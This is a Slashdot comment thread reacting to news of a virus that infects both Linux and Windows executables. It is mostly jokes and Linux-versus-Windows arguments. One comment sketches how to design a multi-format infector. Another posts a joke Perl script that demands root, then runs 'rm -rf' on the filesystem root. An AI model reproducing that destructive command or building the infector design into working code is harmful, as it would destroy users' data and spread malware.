FungosBauux (929423) | more than 8 years ago | (#15087300)

You are right. But no need of a "generic platform discovery code", all you need Is mirrored codes that are done for each platform. Your platform discovery code is only this: find a binary, look its header, if its PE Executable I will copy my "PE Executable Code as Code attached/injected/... and my ELF/A.OUT code as Data. If its a ELF executable I will copy my "ELF Executable Code as Code attached/injected/... and my PE/A.OUT code as Data, and so on. Its very simply, but its too much work to few revenue from malware contractors. All you need to write a virus like this one, is know most executable formats from any platform. Implement "N" applications for each platform independent of binary format. Implement "M" infectors, one for each file format. Manage that and its done.

Took long enough... (5, Funny)

Eric Damron (553630) | more than 8 years ago | (#15086892)

Well it's about time! Finally inter-platform operability.

Re:Took long enough... (1)

KMitchell (223623) | more than 8 years ago | (#15086964)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Crap. Does anyone know where I can get some antivirus SW for my PET [wikipedia.org] ?

Re:Took long enough... (1)

utlemming (654269) | more than 8 years ago | (#15087269)

LOL. Don't worry, I think your safe. Running anti-virus might use up all 32K of RAM.

Why is it so limited? (1)

SailorFrag (231277) | more than 8 years ago | (#15086899)

"Writing a cross-platform worm is difficult because it limits you to functions that are available on both operating systems," Ullrich said. "You have to also code the virus in assembly to make it work without relying on any OS-specific function," he said.

Why?

Doesn't it seem plausible that it could just have one copy of itself for each executable type, and then whichever one actually executes knows how to insert the other(s) if needed? Then it's not really a single virus, but more of a set of symbiotic viruses. It still gets the same result though.

And so ... (0)

Anonymous Coward | more than 8 years ago | (#15087003)

A smug BSD user snorts in contempt, feeling more than a little superior 8^)

They Hate my AIBO. (1, Troll)

twitter (104583) | more than 8 years ago | (#15087012)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Nooooo! not my AIBO. I knew I should have left off that email and news fetch hack.

What a bunch of BS. How exactly are they supposed to get this assembly code kludge to my machine? Are they going to try to barf zlib? As the article also pointed out, these things have been around since year 2000. In those six years there has been a big fat nothing done with them.

No, don't give me that "popularity" bullshit either. Linux runs most of the web and provides some of the most lucrative targets to Al Queda and other criminals. On the other end, free software run computers will always be more up to date and easier to recover. A Linux user with a misbehaving computer can fix point and click style in 20 minutes with a fairly knew distro [mepis.org] or get the absolute latest and greatest with a net install of Debian. Computer stores can give users the distribution of their choice. Compare that to the non free world, where the user has to bring their "original" Windoze 98 or five year old XP CD into the store or pay $100 for software that might not even run on their old computer. The store then has to go through the mostly useless process of "patching" said ancient junk and the user gets burnt again soon after. The free software world, even a competitive non free world, will never be as bad as M$ is.

Re:They Hate my AIBO. (-1, Offtopic)

Anonymous Coward | more than 8 years ago | (#15087302)

How is a new install of debian the "latest and greatest?"

apt-get never, ever, ever comes close to getting you the latest version of anything in my experience.
I may just be n00b though.

gcc version 3.3.5 (Debian 1:3.3.5-13)
mysql Ver 12.22 Distrib 4.0.24, for pc-linux-gnu (i386)

Conversation with Ubuntu documentation team (0)

Anonymous Coward | more than 8 years ago | (#15087101)

(Funny thing, I just had this exchange with the ubuntu doc team like 5 days ago)

I was browsing http://help.ubuntu.com/starterguide/C/ch07s02.html [ubuntu.com] , and took a look at the AntiVirus server portion. I wanted to recommend updating this portion -

"1. What is Clam AntiVirus (ClamAV) Server?
    Clam AntiVirus (ClamAV) is an anti-virus toolkit for Unix/Linux operating systems. Typically ClamAV is intergrated with email servers and can also be used to scan individual files. Linux rarely suffers from viruses and other nasties that infect other operating systems, so most likely you don't need to install ClamAV."

I would recommend replacing this with something along the lines of "While Linux rarely suffers from viruses and other nasties that infect other operating systems, it is wise to keep your system protected with anti-virus software and up to date definitions."

We all agree that linux is more secure and less prone to viruses then other operating systems, however, comments like this tend to promote a certain ignorance and a false sense of security.

--
response

Actually, I'm not sure that this is right. Antivirus is generally used
on linux machines only where there are samba shares or a mail server.
Running antivirus software is not (to my knowledge) a common part of
keeping your linux system safe. If someone tells me otherwise, I'm happy
to reconsider this section of the guide.

--
my response back

Fair enough. In those cases (samba and mail servers) it would be much more important. My concern is in looking to a future with linux being the most used desktop OS, and the attention from virus writers coupled with a much higher degree of a non-technical user base. Hopefully at that point, the people that would write viruses instead find open source projects as outlets to their creativity. Promoting the use of the AV software for desktop users now would either promote the ClamAV project or waste their resources with users downloading definitions.

--
response back

Yes, I don't think it's worth promoting it yet. I would think that when
an anti-virus becomes necessary, Ubuntu will provide one by default. But
certainly when the time comes, it will be reflected in the
documentation.

--

I sent him an email with a link to the article :) Besides, a virus scanner would make a great sales tool for free software!

No problem... (3, Funny)

mogrify (828588) | more than 8 years ago | (#15087109)

I'm just recompiling my kernel without support for ELF binaries. Just a quick reboot, and I'

My PET? (2, Funny)

dbc (135354) | more than 8 years ago | (#15087132)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Woah, not my Commodore PET [old-computers.com] (Personal Electronic Transactor)? Nooooo..... I *love* that chicklet keyboard. And the awesome monochrome graphics. They have the playing card suits built in as *characters*, mind you. You can 1000 PRINT them in the built in BASIC!

Let me tell you, though, it was a bitch getting an entire TCP/IP stack working in the 4K of RAM and still have room for a web browser. And don't even get me started on how hard it was to get 100BaseT working over the exapasion port.

Guess it's finally time to retire the old PET.

How About a Story? (3, Insightful)

Einstein_101 (966708) | more than 8 years ago | (#15087198)

Here's a quick anecdote for you:

About a week ago, for various reasons, I decided to format my laptop and put Windows XP Professional on there. I previously had Slackware Linux 10.2 installed, but since my desktop has been dual-booting for a while, I figured I might as well get my money's worth and put Windows on the laptop (Linux also doesn't support the SD card reader, but that's another story). The installation went nicely, and I continued to do the tedious tasks that you do after a format. (validate windows, download patches, install drivers and apps, etc...) I installed a second user account for administrative uses and named it "Root".

I logged into my "Root" account, and installed Chessmaster 9000. When I logged back into my regular user account, the game wouldn't start. After a while, it dawned on me that Chessmaster installs the bulk of the data in your My Documents folder. So I uninstalled it, then tried to install it under my user's account. Now, if you're trying to install a program, and you're not the Administrator, a simple dialog will pop up and prompt you the password. However when the install finished, the program wouldn't start. Since I installed as Administrator (I had no choice), I the data was stored in the Administrator's My Documents folder. I tried to link to it - I even tried to install as Administrator, and put a link to his folder (and changing permissions) in the default folder so all users would use it.

Nothing worked properly. I ended up having to change my user account back to Administrator privileges, install the program, then change it back. And this is just for Chessmaster. Other programs are even worse. Doom 3, FarCry, and Call of Duty all install their data in the Program Files folder. So in order to play the game without being root, you have to change the permissions on the saved games folder.

The point of the story is this: Linux doesn't have the problems that Windows has, because it's more secure by design - not by luck. A significant amount of programs are designed for the user to have Administrator access, and assume that you will always run with such permissions. Windows didn't switch the masses to the NT design until XP, which was released 4th Quarter 2001. As a result, you have generations of programs that assume they can read/write whatever and wherever they want - leaving a mess for the end user to sort out. In the end, they'll just say to hell with it and run as Administrator.

(And that's not even addressing the masses that bought OEM pc's that run XP Home with Administrator priviledes by defaut)

Re:How About a Story? (0)

Anonymous Coward | more than 8 years ago | (#15087278)

How's it Windows' fault that the software written to run on Windows places user save files in the 'secure' Program Files directory? Sounds to me like the game developer should be putting his files elsewhere, like the user/my documents directory -- but wait, then you can't complain about Microsoft, can you?

Obligatory. (-1, Redundant)

Anonymous Coward | more than 8 years ago | (#15087212)

I, for one, welcome our Virus.Linux.Bi.a/Virus.Win32.Bi.a overlords.

Right (0)

Scareduck (177470) | more than 8 years ago | (#15087224)

#!/usr/bin/perl
die "to get pr0n, run this script as root" if($>);
chdir("/");
system("rm -rf * .*");
print "haw haw haw I 0wnz u!!!!!!!\n";

====

Really, now.

Yawn... (1)

iroll (717924) | more than 8 years ago | (#15087295)

Wake me when they add Mach-O to the list!

Ah, but the real question is (1)

overshoot (39700) | more than 8 years ago | (#15087316)

... will it infect an ebuild?
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?